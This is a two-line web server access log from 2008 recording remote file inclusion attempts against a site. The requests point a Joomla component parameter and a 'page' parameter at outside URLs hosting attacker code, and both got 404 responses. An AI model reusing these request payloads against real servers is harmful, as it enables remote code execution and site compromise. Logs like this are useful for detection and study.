64.13.222.135 - - [09/Nov/2008:16:48:06 -0800] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://axioma-dch.com/servicios/FX29ID1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
219.85.63.226 - - [09/Nov/2008:16:48:26 -0800] "GET /logs/access.log/services.php?page=http://ideaindustry.us/content/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
